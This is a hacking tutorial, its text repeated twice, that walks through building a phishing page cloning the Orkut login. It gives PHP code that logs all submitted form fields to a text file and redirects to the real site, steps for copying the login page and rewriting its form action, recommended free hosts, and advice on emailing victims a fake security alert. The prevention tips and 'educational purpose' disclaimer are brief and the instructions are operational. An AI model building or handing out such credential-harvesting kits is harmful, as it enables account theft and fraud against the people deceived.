All of you must have heard about Phishing, It's very common and widely used by the hackers to commit hactivism. If you don't know about it, Then read...
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
Emails containing some Information of your Interest and asking you to Login to Your Account.
Any Email carrying a Link to Click and asking you to Login
Now If You want to create your own phishing page the follow the steps below.
Example is for Orkut.com
Step 1:- <?php
header ('Location: http://www.orkut.com/Home.aspx ');
$handler = fopen("xyz.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
exit;
?>
Copy and paste the above code into notepad and save it as xyz.php
Step:- 2 Open notepad, do not write anything and save the page as the same name in step 1 i.e. xyz.txt
Step:- 3 Now open http://www.orkut.com/ Logout if you are logged in. Right Click on the page and select view source. Shortcut key is {Ctrl+U}.
Step:- 4 Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step:- 5 Then paste this code in a new notepad window and save it as ServiceLogin.htm
Step:- 6 Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step:- 7 You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Keep this window open, Proceed to next step.
Step:- 8 Open www.orkut.com again and copy the logos of google and orkut. Save those logos in a folder named Servicelogin_files
Step:- 9 Upload the folder "ServiceLogin_files" and 2 of the files ->> "xyz.php" and "xyz.txt" in any
web hosting site..
You will have to create a sub-folder in the web hosting site's directory. Name that folder as "ServiceLogin_files" and upload the 2 images of the pack in that folder. (it must support PHPs.)
>>> You can choose one of the following web hosting Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com {Recommended} It will be better for you.
http://www.110mb.com
http://www.phpnet.us
Step:- 10 You will get a link when you will upload the servicelogin.html file. Copy that link and go to STEP 7, and paste the link. Your link will be like this- {{http://urwebhostingsite/urusername/ServiceLogin.htm}}
Step:- 11 You are done just go to the link of the file servicelogin.htm given by your hosting company .
Step:- 12 Now you can send this link to victim by any mode but the best is my email send a fake email in the name of
orkut the your orkut account has a security problem pl. click on th link below and re-activate your account.
Step:- 13 To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company
Congratulations You have been successful.
Prevention Against Phishing :-
Read all the Email Carefully and Check if the Sender is Original.
Watch the Link Carefully before Clicking
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email.
REMEMBER
“Do not use this hack trick in any criminal activities like phishing bank websites and please do not
destroy any ones account this is only for educational purpose”.
The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords
and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,
however, is Bogus and set up only to steal the User’s information.
Phishing attacks are Trying to steal your Money !!!
Phishing Scams Could Be-
Emails inviting you to join a Social Group, asking you to Login using your Username and Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
Emails containing some Information of your Interest and asking you to Login to Your Account.
Any Email carrying a Link to Click and asking you to Login
Now If You want to create your own phishing page the follow the steps below.
Example is for Orkut.com
Step 1:- <?php
header ('Location: http://www.orkut.com/Home.aspx ');
$handler = fopen("xyz.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
}
fwrite($handler, "\r\n");
fclose($handler);
exit;
?>
Copy and paste the above code into notepad and save it as xyz.php
Step:- 2 Open notepad, do not write anything and save the page as the same name in step 1 i.e. xyz.txt
Step:- 3 Now open http://www.orkut.com/ Logout if you are logged in. Right Click on the page and select view source. Shortcut key is {Ctrl+U}.
Step:- 4 Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step:- 5 Then paste this code in a new notepad window and save it as ServiceLogin.htm
Step:- 6 Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step:- 7 You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Keep this window open, Proceed to next step.
Step:- 8 Open www.orkut.com again and copy the logos of google and orkut. Save those logos in a folder named Servicelogin_files
Step:- 9 Upload the folder "ServiceLogin_files" and 2 of the files ->> "xyz.php" and "xyz.txt" in any
web hosting site..
You will have to create a sub-folder in the web hosting site's directory. Name that folder as "ServiceLogin_files" and upload the 2 images of the pack in that folder. (it must support PHPs.)
>>> You can choose one of the following web hosting Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com {Recommended} It will be better for you.
http://www.110mb.com
http://www.phpnet.us
Step:- 10 You will get a link when you will upload the servicelogin.html file. Copy that link and go to STEP 7, and paste the link. Your link will be like this- {{http://urwebhostingsite/urusername/ServiceLogin.htm}}
Step:- 11 You are done just go to the link of the file servicelogin.htm given by your hosting company .
Step:- 12 Now you can send this link to victim by any mode but the best is my email send a fake email in the name of
orkut the your orkut account has a security problem pl. click on th link below and re-activate your account.
Step:- 13 To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company
Congratulations You have been successful.
Prevention Against Phishing :-
Read all the Email Carefully and Check if the Sender is Original.
Watch the Link Carefully before Clicking
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in any other Website or Email.
REMEMBER
“Do not use this hack trick in any criminal activities like phishing bank websites and please do not
destroy any ones account this is only for educational purpose”.
